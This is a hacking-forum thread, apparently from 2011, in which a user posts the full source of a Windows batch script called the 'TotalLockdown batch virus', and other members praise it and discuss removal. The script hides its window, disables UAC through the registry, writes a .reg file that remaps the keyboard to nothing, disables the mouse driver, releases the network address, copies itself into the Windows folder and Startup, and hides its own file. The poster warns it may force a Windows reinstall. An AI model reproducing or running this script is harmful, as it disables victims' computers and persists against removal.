The TotalLockdown batch virus

D4rkus · 1 The TotalLockdown batch virus Thu Jan 13, 2011 5:19 am

D4rkus

Moderators

Posts : 26
Tokens : 9783
Reputation : 1
Join date : 2011-01-13
Location : Russia

This little batch code here hides the CMD windows, disables the keyboard and the mouse, copies itself to autorun and replaces winstart.bat so you can,t get rid of him, then hides the source.
And also messes up the IP

@echo off
if exist winstart.vbs goto next
echo set objShell = CreateObject("WScript.Shell") >> winstart.vbs
echo objShell.Run "batvirus.bat", vbHide, TRUE >> winstart.vbs
start "" "winstart.vbs"
exit
:next
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
COPY %0 %windir%WINSTART.BAT
copy "startup.bat" "%userprofile%\Start Menu\Programs\Startup\startup.bat"
attrib +h %0

Use carrefuly, or you may need to reinstall windows

Last edited by D4rkus on Thu Jan 13, 2011 11:36 am; edited 1 time in total

Defy · 2 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:23 am

Defy

Admin

Posts : 83
Tokens : 9866
Reputation : 1
Join date : 2011-01-13
Age : 28
Location : Syn City

Awesome script there mate!

TriGz · 3 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:24 am

TriGz

Admin

Posts : 7
Tokens : 9773
Reputation : 0
Join date : 2011-01-13

That looks like a pretty dangerous script to be running.
How would you go about removing it?

D4rkus · 4 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:30 am

D4rkus

Moderators

Posts : 26
Tokens : 9783
Reputation : 1
Join date : 2011-01-13
Location : Russia

TriGz wrote:That looks like a pretty dangerous script to be running.
How would you go about removing it?

Reinstall Windows software, i cant see another way. Because you can't use the mouse and the keyboard even if you do a system restart

TriGz · 5 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:38 am

TriGz

Admin

Posts : 7
Tokens : 9773
Reputation : 0
Join date : 2011-01-13

D4rkus wrote:Reinstall Windows software, i cant see another way. Because you can't use the mouse and the keyboard even if you do a system restart

Could safe mode prevent it though? My guess is yes.
Then from there it is a simple remove from startup process.

D4rkus · 6 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:42 am

D4rkus

Moderators

Posts : 26
Tokens : 9783
Reputation : 1
Join date : 2011-01-13
Location : Russia

TriGz wrote:

D4rkus wrote:Reinstall Windows software, i cant see another way. Because you can't use the mouse and the keyboard even if you do a system restart

Could safe mode prevent it though? My guess is yes.
Then from there it is a simple remove from startup process.

Thats possible, i didn't tried that. But it copies to %windir% as WINSTART.BAT not only to start up

Sponsored content

The TotalLockdown batch virus

1 The TotalLockdown batch virus Thu Jan 13, 2011 5:19 am

D4rkus

2 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:23 am

Defy

3 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:24 am

TriGz

4 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:30 am

D4rkus

5 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:38 am

TriGz

6 Re: The TotalLockdown batch virus Thu Jan 13, 2011 5:42 am

D4rkus

7 Re: The TotalLockdown batch virus

Sponsored content